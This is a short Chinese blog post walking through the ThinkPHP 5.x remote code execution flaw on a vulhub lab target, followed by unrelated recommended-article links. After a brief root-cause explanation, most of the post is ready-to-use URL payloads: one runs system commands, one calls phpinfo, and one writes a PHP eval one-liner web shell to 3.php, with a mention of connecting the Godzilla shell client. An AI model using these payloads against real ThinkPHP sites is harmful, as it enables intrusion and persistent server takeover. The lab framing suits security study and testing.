Thinkphp5x远程执行命令及getshell

一.环境配置

靶场:vulhub/thinkphp/5-rce

docker-compose up -d #启动环境

访问靶场:

漏洞利用:

漏洞根本源于 thinkphp/library/think/Request.php 中method⽅法可以进⾏变量覆盖,通 过覆盖类的核⼼属性filter导致rce,其攻击点较为多,有些还具有限制条件,另外由于种种部分 原因,在利⽤上会出现⼀些问题

远程命令执行:

POC:?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1] []=whoami

执行完如下图

远程代码执行:

POC:?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

如下图

写入一句话木马:

POC:?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<?php @eval(\$_POST[cmd]);?>">>3.php

然后去访问我们的3.php 创建成功

哥斯拉连接:

相关推荐
zc-code4 分钟前
Spring Boot + @RefreshScope:动态刷新配置的终极指南
java·spring boot·后端
何中应9 分钟前
EasyExcel使用(二:写出)
java·后端·maven·excel
awonw18 分钟前
[python][基础]Flask 技术栈
开发语言·python·flask
木宇(记得热爱生活)31 分钟前
Qt GUI缓存实现
开发语言·qt·缓存
lly20240635 分钟前
C# 正则表达式
开发语言
Chef_Chen37 分钟前
从0开始学习R语言--Day58--竞争风险模型
android·开发语言·kotlin
minji...1 小时前
数据结构 堆(4)---TOP-K问题
java·数据结构·算法
开开心心_Every1 小时前
多线程语音识别工具
javascript·人工智能·ocr·excel·语音识别·symfony
咖啡の猫1 小时前
bash的特性-常见的快捷键
开发语言·chrome·bash
命苦的孩子1 小时前
Java 中的排序算法详解
java·开发语言·排序算法